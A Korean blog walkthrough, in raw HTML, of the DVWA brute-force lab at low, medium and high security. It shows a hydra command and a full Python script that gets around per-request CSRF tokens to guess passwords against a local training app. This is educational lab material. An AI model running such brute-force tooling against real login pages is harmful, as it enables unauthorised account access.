&lt;div&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;422&quot; data-origin-height=&quot;235&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/SYMGq/btsLN0sMEFw/zZyH20tiZkmiHZ26B5SdFk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/SYMGq/btsLN0sMEFw/zZyH20tiZkmiHZ26B5SdFk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/SYMGq/btsLN0sMEFw/zZyH20tiZkmiHZ26B5SdFk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FSYMGq%2FbtsLN0sMEFw%2FzZyH20tiZkmiHZ26B5SdFk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;422&quot; height=&quot;235&quot; data-origin-width=&quot;422&quot; data-origin-height=&quot;235&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;`admin`/`password`로 로그인을 시도하면,&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; color: #333333; text-align: left;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;673&quot; data-origin-height=&quot;334&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bhgoGE/btsLMVTuYb2/C6eilvsXoBa4rbbxmWek4K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bhgoGE/btsLMVTuYb2/C6eilvsXoBa4rbbxmWek4K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bhgoGE/btsLMVTuYb2/C6eilvsXoBa4rbbxmWek4K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbhgoGE%2FbtsLMVTuYb2%2FC6eilvsXoBa4rbbxmWek4K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;673&quot; height=&quot;334&quot; data-origin-width=&quot;673&quot; data-origin-height=&quot;334&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;성공!  &lt;/b&gt;&lt;/p&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 공격 도구 : `hydra` 도구를 이용하여 무차별 공격&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;hydra는 네트워크 서비스나&amp;nbsp; 웹 애플리케이션에서 무차별 대입 공격을 수행하기 위해서 설계된 오픈 소스 도구.&lt;br /&gt;&lt;br /&gt;[사용법]&lt;br /&gt;hydra [옵션] 서비스://타켓&lt;br /&gt;[주요 옵션]&lt;br /&gt;- l&amp;nbsp; 아이디&lt;br /&gt;- L 아이디 리스트 파일&lt;br /&gt;- p 비밀번호&lt;br /&gt;- P 비밀번호 사전파일&lt;br /&gt;F=: 로그인 실패 메시지&lt;br /&gt;S=: 로그인 성공 메시지&lt;br /&gt;H=: 헤더&lt;br /&gt;-v : 자세히&lt;br /&gt;-V : login+pass 보여줌&lt;br /&gt;-f : 비밀번호를 발견하면 종료&lt;br /&gt;-t : 동시에 실행하는 작업수 (기본값 16)&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;font-family: 'IBM Plex Sans KR'; sans-serif; box-sizing: border-box; margin: 10px; line-height: 1.5em; background-color: #424242; padding: 20px; color: #ffffff; border-radius: 20px;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;&lt;span style=&quot;text-align: left;&quot;&gt;hydra -L ~/study/id.txt -P ~/study/passwords_quick.txt localhost http-get-form &quot;/dvwa/vulnerabilities/brute/index.php:username=&lt;/span&gt;&lt;b&gt;^USER^&lt;/b&gt;&lt;span style=&quot;text-align: left;&quot;&gt;&amp;amp;password=&lt;/span&gt;&lt;b&gt;^PASS^&lt;/b&gt;&lt;span style=&quot;text-align: left;&quot;&gt;&amp;amp;Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=mtnakaa2ob8drdr68rc8edbum3&quot; -V -f&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;-L ~/study/id.txt : 사용자 이름 목록 파일 경로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;-P ~/study/passwords_quick.txt : 비밀번호 목록 파일 경로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;localhost : 공격 대상의 주소&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;http-get-form : HTTP GET 요청&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;username=^USER^&amp;amp;password=^PASS^&amp;amp;Login=Login : 로그인 폼에 전송될 데이터 (^USER^는 사용자 이름 목록에서 하나씩 대체되고, ^PASS^는 비밀번호 목록에서 하니씩 대체)&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;755&quot; data-origin-height=&quot;272&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/LkR96/btsLMon6qN6/7oOyivQdkt1WL3BE8owCS0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/LkR96/btsLMon6qN6/7oOyivQdkt1WL3BE8owCS0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/LkR96/btsLMon6qN6/7oOyivQdkt1WL3BE8owCS0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FLkR96%2FbtsLMon6qN6%2F7oOyivQdkt1WL3BE8owCS0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;267&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;755&quot; data-origin-height=&quot;272&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;739&quot; data-origin-height=&quot;200&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bHCpLd/btsLOufPSOn/Y1sVPQiLFg7jhU1lKrpdKK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bHCpLd/btsLOufPSOn/Y1sVPQiLFg7jhU1lKrpdKK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bHCpLd/btsLOufPSOn/Y1sVPQiLFg7jhU1lKrpdKK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbHCpLd%2FbtsLOufPSOn%2FY1sVPQiLFg7jhU1lKrpdKK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;200&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;739&quot; data-origin-height=&quot;200&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;  2. Medium Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;low level과 앞의 과정을 동일하게 하면 같은 결과를 얻을 수 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;755&quot; data-origin-height=&quot;425&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ub2wI/btsLM10lLn8/Vjhis5Fsb1DZxkGbGm1bw1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ub2wI/btsLM10lLn8/Vjhis5Fsb1DZxkGbGm1bw1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ub2wI/btsLM10lLn8/Vjhis5Fsb1DZxkGbGm1bw1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fub2wI%2FbtsLM10lLn8%2FVjhis5Fsb1DZxkGbGm1bw1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;417&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;755&quot; data-origin-height=&quot;425&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ low level과의 차이점은 계정 정보를 얻는데 시간이 더 오래 걸린다는 것이다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;745&quot; data-origin-height=&quot;419&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/WF1xO/btsLL6Bgi38/pHB5Qg5lwTTQkLN7aY55b0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/WF1xO/btsLL6Bgi38/pHB5Qg5lwTTQkLN7aY55b0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/WF1xO/btsLL6Bgi38/pHB5Qg5lwTTQkLN7aY55b0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FWF1xO%2FbtsLL6Bgi38%2FpHB5Qg5lwTTQkLN7aY55b0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;416&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;745&quot; data-origin-height=&quot;419&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `sleep(2);` 함수가 실행되어 login failed시 2초의 대기시간이 발생한다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;  3. High Level&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;751&quot; data-origin-height=&quot;422&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cMuHIY/btsLN8D3rxv/QcSIiUlY1G0DcgwOpoWtk1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cMuHIY/btsLN8D3rxv/QcSIiUlY1G0DcgwOpoWtk1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cMuHIY/btsLN8D3rxv/QcSIiUlY1G0DcgwOpoWtk1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcMuHIY%2FbtsLN8D3rxv%2FQcSIiUlY1G0DcgwOpoWtk1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;416&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;751&quot; data-origin-height=&quot;422&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;753&quot; data-origin-height=&quot;424&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/w8j9k/btsLMKkmJJw/ItJKpU76K8CJQZZ5gqv8RK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/w8j9k/btsLMKkmJJw/ItJKpU76K8CJQZZ5gqv8RK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/w8j9k/btsLMKkmJJw/ItJKpU76K8CJQZZ5gqv8RK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fw8j9k%2FbtsLMKkmJJw%2FItJKpU76K8CJQZZ5gqv8RK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;417&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;753&quot; data-origin-height=&quot;424&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  low level이랑 medium level처럼 공격을 시도하면, 기존과 다르게 Status code 302가 뜬다. 302 HTTP 응답 상태 코드는, 클라이언트가 요청한 리소스가 임시적으로 다른 URL로 이동되었음을 나타낸다. 이는 임시 리다이렉션을 의미하며, 클라이언트는 새 URL로 요청을 보내야 한다.&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;302 상태 코드의 주요 특징&lt;br /&gt;- 임시 이동: 서버가 클라이언트를 새 URL로 이동시키지만, 원래 URL은 여전히 유효합니다.&lt;br /&gt;- 클라이언트 동작: 클라이언트(웹 브라우저)는 보통 Location 헤더에 지정된 새 URL로 자동 요청을 보냅니다.&lt;br /&gt;- HTTP 메서드 유지: 클라이언트는 원래 요청의 HTTP 메서드(GET, POST 등)를 유지합니다. 하지만 일부 브라우저는 POST 요청을 GET 요청으로 변경할 수 있습니다(비표준 동작).&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;690&quot; data-origin-height=&quot;566&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dYJNoI/btsLNB7XvZC/HksgWKFZ9XkQ9k1CVHnl3K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dYJNoI/btsLNB7XvZC/HksgWKFZ9XkQ9k1CVHnl3K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dYJNoI/btsLNB7XvZC/HksgWKFZ9XkQ9k1CVHnl3K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdYJNoI%2FbtsLNB7XvZC%2FHksgWKFZ9XkQ9k1CVHnl3K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;690&quot; height=&quot;566&quot; data-origin-width=&quot;690&quot; data-origin-height=&quot;566&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;로그인 페이지에서 로그인을 시도하면 `CSRF token is incorrect`라는 메시지가 뜬다. CSRF token이 설정되어 있어 매번 로그인 시 token 값이 달라지지만, `Brup Suite`로 공격을 시도하면 token값이 로그인 할때마다 같기 때문에 오류(302)가 발생한 것이다.&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt;CSRF token&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;CSRF(Cross-Site Request Forgery) 공격을 방지하기 위해 웹 애플리케이션에서 사용하는 보안 메커니즘.&lt;br /&gt;CSRF 토큰은 사용자가 의도하지 않은 악의적인 요청을 방지하기 위해서 클라이언트와 서버 간의 요청에서 유효성을 검증하는 데 사용된다.&amp;nbsp;&lt;br /&gt;토큰 생성 : 클라이언트가 서버에 처음 요청했을 때, 서버가 고유한 CSRF 토큰을 생성해서 클라이언트에 거 전송&lt;br /&gt;토큰 전송 : 클라이언트가 이후의 요청에 CSRF 토큰을 포함해서 전송&lt;br /&gt;토큰 검증 : 서버는 요청에서 받은 토큰과 세션에 저장된 토큰을 비교. 일치하지 않거나 없는 경우 요청을 차단&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/luzQE/btsLMWEQwNL/xiqOYSglK1Kc4a8Z40QaoK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/luzQE/btsLMWEQwNL/xiqOYSglK1Kc4a8Z40QaoK/img.png&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;526&quot; data-is-animation=&quot;false&quot; style=&quot;width: 49.3245%; margin-right: 10px;&quot; data-widthpercent=&quot;49.9&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/luzQE/btsLMWEQwNL/xiqOYSglK1Kc4a8Z40QaoK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FluzQE%2FbtsLMWEQwNL%2FxiqOYSglK1Kc4a8Z40QaoK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;526&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bahcTq/btsLOvFND6B/xP9iduPdPc8SkjuEHqINJk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bahcTq/btsLOvFND6B/xP9iduPdPc8SkjuEHqINJk/img.png&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;524&quot; data-is-animation=&quot;false&quot; style=&quot;width: 49.5127%;&quot; data-widthpercent=&quot;50.1&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bahcTq/btsLOvFND6B/xP9iduPdPc8SkjuEHqINJk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbahcTq%2FbtsLOvFND6B%2FxP9iduPdPc8SkjuEHqINJk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;524&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;`Burp Suite`로 Request를 확인해보면, 토큰값이 계속 바뀌기 때문에, 기존에 low level, medium level에서 시도했던 brute force 공격이 제대로 작동하지 않는다는 것을 알수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;  &lt;b&gt;그렇기 때문에, high level에서 해야 할 것은 매번 로그인마다 유효한 토근을 제공해 주어야 한다. `burp suite`에서는 해당 기능을 수행할 수 없기 때문에, 매번 바뀌는 토큰 값을 넣어주는 자동화된 스크립트를 작성해야한다. &lt;/b&gt;(역시... High level)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;작성된 Python 코드 : &lt;/p&gt;
&lt;pre id=&quot;code_1736864718022&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;#!/usr/bin/python
# Quick PoC template for HTTP GET form brute force with CSRF token
# Target: DVWA v1.10 (Brute Force - High)
#   Date: 2015-11-07
# Author: g0tmi1k ~ https://blog.g0tmi1k.com/
# Source: https://blog.g0tmi1k.com/dvwa/bruteforce-high/

import requests
import sys
import re
from BeautifulSoup import BeautifulSoup


# Variables
target = 'http://localhost/dvwa'
sec_level = 'high'
dvwa_user = 'admin'
dvwa_pass = 'password'
user_list = 'id.txt'
pass_list = 'passwords_quick.txt'


# Value to look for in response header (Whitelisting)
success = 'Welcome to the password protected area'


# Get the anti-CSRF token
def csrf_token(path,cookie=''):
    try:
        # Make the request to the URL
        #print &quot;\n[i] URL: %s/%s&quot; % (target, path)
        r = requests.get(&quot;{0}/{1}&quot;.format(target, path), cookies=cookie, allow_redirects=False)

    except:
        # Feedback for the user (there was an error) &amp;amp; Stop execution of our request
        print &quot;\n[!] csrf_token: Failed to connect (URL: %s/%s).\n[i] Quitting.&quot; % (target, path)
        sys.exit(-1)

    # Extract anti-CSRF token
    soup = BeautifulSoup(r.text)
    user_token = soup(&quot;input&quot;, {&quot;name&quot;: &quot;user_token&quot;})[0][&quot;value&quot;]
    #print &quot;[i] user_token: %s&quot; % user_token

    # Extract session information
    session_id = re.match(&quot;PHPSESSID=(.*?);&quot;, r.headers[&quot;set-cookie&quot;])
    session_id = session_id.group(1)
    #print &quot;[i] session_id: %s&quot; % session_id

    return session_id, user_token


# Login to DVWA core
def dvwa_login(session_id, user_token):
    # POST data
    data = {
        &quot;username&quot;: dvwa_user,
        &quot;password&quot;: dvwa_pass,
        &quot;user_token&quot;: user_token,
        &quot;Login&quot;: &quot;Login&quot;
    }

    # Cookie data
    cookie = {
        &quot;PHPSESSID&quot;: session_id,
        &quot;security&quot;: sec_level
    }

    try:
        # Make the request to the URL
        print &quot;\n[i] URL: %s/login.php&quot; % target
        print &quot;[i] Data: %s&quot; % data
        print &quot;[i] Cookie: %s&quot; % cookie
        r = requests.post(&quot;{0}/login.php&quot;.format(target), data=data, cookies=cookie, allow_redirects=False)

    except:
        # Feedback for the user (there was an error) &amp;amp; Stop execution of our request
        print &quot;\n\n[!] dvwa_login: Failed to connect (URL: %s/login.php).\n[i] Quitting.&quot; % (target)
        sys.exit(-1)

    # Wasn't it a redirect?
    if r.status_code != 301 and r.status_code != 302:
        # Feedback for the user (there was an error again) &amp;amp; Stop execution of our request
        print &quot;\n\n[!] dvwa_login: Page didn't response correctly (Response: %s).\n[i] Quitting.&quot; % (r.status_code)
        sys.exit(-1)

    # Did we log in successfully?
    if r.headers[&quot;Location&quot;] != 'index.php':
        # Feedback for the user (there was an error) &amp;amp; Stop execution of our request
        print &quot;\n\n[!] dvwa_login: Didn't login (Header: %s  user: %s  password: %s  user_token: %s  session_id: %s).\n[i] Quitting.&quot; % (
          r.headers[&quot;Location&quot;], dvwa_user, dvwa_pass, user_token, session_id)
        sys.exit(-1)

    # If we got to here, everything should be okay!
    print &quot;\n[i] Logged in! (%s/%s)\n&quot; % (dvwa_user, dvwa_pass)
    return True


# Make the request to-do the brute force
def url_request(username, password, user_token, session_id):
    # GET data
    data = {
        &quot;username&quot;: username,
        &quot;password&quot;: password,
        &quot;user_token&quot;: user_token,
        &quot;Login&quot;: &quot;Login&quot;
    }

    # Cookie data
    cookie = {
        &quot;PHPSESSID&quot;: session_id,
        &quot;security&quot;: sec_level
    }

    try:
        # Make the request to the URL
        #print &quot;\n[i] URL: %s/vulnerabilities/brute/&quot; % target
        #print &quot;[i] Data: %s&quot; % data
        #print &quot;[i] Cookie: %s&quot; % cookie
        r = requests.get(&quot;{0}/vulnerabilities/brute/&quot;.format(target), params=data, cookies=cookie, allow_redirects=False)

    except:
        # Feedback for the user (there was an error) &amp;amp; Stop execution of our request
        print &quot;\n\n[!] url_request: Failed to connect (URL: %s/vulnerabilities/brute/).\n[i] Quitting.&quot; % (target)
        sys.exit(-1)

    # Was it a ok response?
    if r.status_code != 200:
        # Feedback for the user (there was an error again) &amp;amp; Stop execution of our request
        print &quot;\n\n[!] url_request: Page didn't response correctly (Response: %s).\n[i] Quitting.&quot; % (r.status_code)
        sys.exit(-1)

    # We have what we need
    return r.text


# Main brute force loop
def brute_force(session_id):
    # Load in wordlists files
    with open(pass_list) as password:
        password = password.readlines()
    with open(user_list) as username:
        username = username.readlines()

    # Counter
    i = 0

    # Loop around
    for PASS in password:
        for USER in username:
            USER = USER.rstrip('\n')
            PASS = PASS.rstrip('\n')

            # Increase counter
            i += 1
            # Feedback for the user
            print (&quot;[i] Try %s: %s // %s&quot; % (i, USER, PASS))

            # Get CSRF token
            session_id, user_token = csrf_token('/vulnerabilities/brute/', {&quot;PHPSESSID&quot;: session_id})

            # Make request
            attempt = url_request(USER, PASS, user_token, session_id)
            #print attempt

            # Check response
            if success in attempt:
                print (&quot;\n\n[i] Found!&quot;)
                print &quot;[i] Username: %s&quot; % (USER)
                print &quot;[i] Password: %s&quot; % (PASS)
                return True
    return False


# Get initial CSRF token
session_id, user_token = csrf_token('login.php')


# Login to web app
dvwa_login(session_id, user_token)


# Start brute forcing
brute_force(session_id)&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 코드 출처 : &lt;a href=&quot;https://blog.g0tmi1k.com/dvwa/bruteforce-high/&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://blog.g0tmi1k.com/dvwa/bruteforce-high/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1736864867605&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;DVWA - Brute Force (High Level) - Anti-CSRF Tokens - g0tmi1k&quot; data-og-description=&quot;This is the final &amp;quot;how to&amp;quot; guide which brute focuses Damn Vulnerable Web Application (DVWA), this time on the high security level. It is an expansion from the &amp;quot;low&amp;quot; level (which is a straightforward HTTP GET form attack). The main login screen shares simil&quot; data-og-host=&quot;blog.g0tmi1k.com&quot; data-og-source-url=&quot;https://blog.g0tmi1k.com/dvwa/bruteforce-high/&quot; data-og-url=&quot;https://blog.g0tmi1k.com/dvwa/bruteforce-high/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/uJsEB/hyX0k7kur3/gZ3UhAISNXzJYkDI7U1c01/img.png?width=1395&amp;amp;height=755&amp;amp;face=0_0_1395_755,https://scrap.kakaocdn.net/dn/cVe3vO/hyX0rSXfwi/iSLctyKqCLXkRpeArNtHe1/img.png?width=1139&amp;amp;height=830&amp;amp;face=0_0_1139_830,https://scrap.kakaocdn.net/dn/lRuH7/hyX0o2ZrM7/eC9uxLuIkmypziyYZZL6t0/img.png?width=900&amp;amp;height=371&amp;amp;face=0_0_900_371&quot;&gt;&lt;a 